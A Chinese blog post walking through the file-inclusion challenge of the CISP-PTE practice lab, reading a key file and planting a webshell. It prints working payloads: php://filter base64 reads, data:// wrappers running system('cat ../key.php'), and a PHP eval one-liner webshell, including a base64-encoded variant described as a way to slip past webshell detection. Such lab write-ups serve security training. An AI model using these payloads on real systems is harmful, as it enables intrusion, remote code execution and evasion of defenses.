首页 > 其他分享 >CISP-PTE靶场通关思路分享-文件包含篇(十分友好,无比详细)

CISP-PTE靶场通关思路分享-文件包含篇(十分友好,无比详细)

时间:2023-04-04 16:11:49浏览次数:38  
标签:file fu1 PTE CISP 192.168 key 靶场 php data

PTE靶场包含5道Web题之文件包含靶场,此靶场为模拟靶场

文件包含

从首页中我们知道了需要读取根目录下的key.php文件,尝试获取WebShell

 

 

 

不获取Shell,直接读取key.php文件内容:

  使用伪协议php://filter可以达到的目的;

  使用data伪协议

使用伪协议data://可以达到注入木马获取WebShell的目的

 

一、不获取Shell,直接读取key.php文件内容,具体操作步骤如下:

    • 方法一:使用伪协议php://filter读取key.php文件(../key.php)

构造payload:

http://192.168.110.100:83/vulnerabilities/fu1.php?file=php://filter/read=convert.base64-encode/resource=../key.php 

或者

http://192.168.43.99:8083/vulnerabilities/fu1.php?file=php://filter/convert.base64-encode/resource=../key.php

 

 

Base64解码后得到结果:

 

  • 方法二:使用data协议,接着查看浏览器页面源代码即可得到key.php中包含的key:

构造payload:

http://192.168.110.100:83/vulnerabilities/fu1.php?file=data:text/txt,<?php system('cat ../key.php')?>

或者

http://192.168.110.100:83/vulnerabilities/fu1.php?file=data:txt/txt,<?php system('cat ../key.php')?>

 

 

然后查看网页源代码,如图所示:

 

 二、使用伪协议data://可以达到注入木马获取WebShell的目的

直接使用data协议:

下面两者payload都可以成功,成功注入后连接菜刀,蚁剑等工具即可成功获取webshell

http://192.168.110.100:83/vulnerabilities/fu1.php?file=data:text/txt,<?php @eval($_POST['a']);?>

拓展,若网站有检测一句话木马上传失败,可使用base64编码,将一句话木马编码后使用data协议进行绕过,如下面代码所示:
下面代码中最后的PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=解码后即为一句话木马,注意:一句话木马编码后的结果不能有加号"+",
若有加号在url编码中代表为空格,就会被替换为空格导致木马上传失败。 若存在加号,则可以使用对一句话木马加减空格等方法使编码后的base64编码中不含加号。 http://192.168.110.100:83/vulnerabilities/fu1.php?file=data://text/txt;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=

 

 连接成功:

 

 

 

 

 

 

 

 

 

 

标签:file,fu1,PTE,CISP,192.168,key,靶场,php,data
From: https://www.cnblogs.com/newcomer/p/17280160.html

相关文章

  • 使用 Lambda Web Adapter 在 Lambda 上 构建 web 应用
    背景介绍AmazonLambda可结合AmazonAPIGateway或ApplicationLoadBalancer,使您无需提前启动或管理服务器即可运行基于restfulAPI的应用程序。此时,Lambda将以JSON格式的字符串接收http事件,并将其转换为对象,它将事件对象以及上下文传递给Lambda函数。而对于已经开......
  • vulnstack1 靶场做题笔记
    一、环境部署1.1靶场下载下载靶场(win7+win2003+win2008),下载攻击机kalilinux下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/靶机通用密码:hongrisec@2019(密码策略原因登录后都会进行修改),这里我改成[email protected]网卡配置环境分析:winserver2008图......
  • Apptentive:植入式工具帮开发者收集用户反馈
    Apptentive,提供一种可嵌入应用的装置帮主开发者收集用户反馈的创业公司,日期获得了120万美元的种子融资。该轮融资来自Founder’sCo-Op、GoogleVentures、SocialLeverage、GoldenVenturePartners和西雅图一些天使投资。该公司的创始人分别都是微软、雅虎、苹果和Greystripe的......
  • c++ primer chapter 16.4
    /*#include<iostream>#include<string>#include<vector>#include<list>usingnamespacestd;template<typenameI,typenameT>Ifind(Ib,Ie,constT&v){while(b!=e&&*b!=v){b++;returnb;}}i......
  • CISP-PTE靶场通关思路分享-SQL注入篇
    pte靶场中包含5道web题SQL注入首先打开本地搭建的网址,发现我们需要利用SQL注入对/tmp/360/key文件进行读取,读取该文件需要使用load_file()函数,该函数是MySQL中常见内置函数。   进入答题后,发现由当前执行的SQL语句,按照当前执行的SQL语句对SQL语法进行闭合 1http:/......
  • 渗透测试靶场
    sqli-labssqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用下载地址:https://github.com/Audi-1/sqli-labsxsschallengesxsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用下载地址:http://xss-quiz.int21h.jp/xss-l......
  • Sqlsugar哪个方法是实现了ADO.NET-MSSQL的SqlDataAdapter
    一、ADO.NET-MSSQL的SqlDataAdapter/*使用DataSet数据集更新数据*为了将数据库的数据填充到dataset中,则必须先使用adapter对象的方法实现填充*......
  • Region-区域适配器RegionAdapter
    Prism内置了几个区域适配器ContentControlRegionAdapterItemsControlRegionAdapterSelectorRegionAdapterComboBoxListBoxRibbonTabControl所以我们可以......
  • vulnhub靶场之WIRELESS: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:Wireless:1,下载地址:https://download.vulnhub.com/wireless/Mystiko-Wireless.rar,下载后直接vm打开即可。知识点:lxd提权、密码......
  • [CTF] Ethernaut靶场 WP (更新中)
    刚醒,怎么大家都会区块链了啊。这下不得不学了[Level1]HelloEthernaut比较基础的入门教程从9给你的提示开始一路往下走就行如下然后直接submit即可[Level2]F......